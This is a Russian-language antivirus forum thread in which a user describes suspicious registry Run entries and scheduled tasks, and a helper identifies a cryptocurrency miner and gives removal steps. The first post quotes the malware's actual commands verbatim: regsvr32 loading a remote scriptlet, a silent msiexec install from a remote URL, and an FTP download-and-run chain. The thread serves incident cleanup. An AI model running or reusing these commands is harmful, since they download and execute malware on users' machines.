Avast WEBforum

Non-English Zone => Русский => Topic started by: REDACTED on August 11, 2017, 01:00:10 AM

Title: нашел странные записи в реестре
Post by: REDACTED on August 11, 2017, 01:00:10 AM

Здравствуйте, у меня такая проблема: обнаружил в реестре в разделе Run две, отсутствующие до этого записи -
Имя - Start.  Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1.  Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
Кроме того в планировщике заданий появились несколько записей -
 Mysa. Действие - Запуск программы. Подробности - /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe.
 Mysa1
 Mysa2
 Mysa3
с перепугу удалил их, а потом у Вас на форуме нашел похожий случай.
Подскажите, пожалуйста, это всё или нужны еще какие-то действия ?
Прикрепил логи, собранные по инструкции.

Title: Re: нашел странные записи в реестре
Post by: Andrey,pro on August 11, 2017, 07:00:20 PM

alndr, здравствуйте и добро пожаловать на форум!

У вас был биткойн-майнер, который использовал вычислительные мощности ПК для добычи криптовалюты. MBAM удалил его.

1. Через Установку и удаление программ в Панели управления удалите программу WindowsMangerProtect.
2.

• Сохраните прикрепленный файл fixlist.txt в папку, откуда был запущен FRST (E:\Документы\Резерв\Programs\Antivirus)
  
• Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  
• Обратите внимание, что компьютер будет перезагружен.

ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!

3. Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.

Title: Re: нашел странные записи в реестре
Post by: REDACTED on August 11, 2017, 08:20:04 PM

сделал по шагам, результат
прикрепил во вложении

узел root\subscription не конечный элемент дерева - это нормально ?
в нем вот такие элементы
ROOT\subscription\ms_409
ROOT\subscription\ms_419

я скопировал скрипт именно с корневого элемента.

Title: Re: нашел странные записи в реестре
Post by: Andrey,pro on August 11, 2017, 09:48:29 PM

alndr, проблема по-прежнему наблюдается?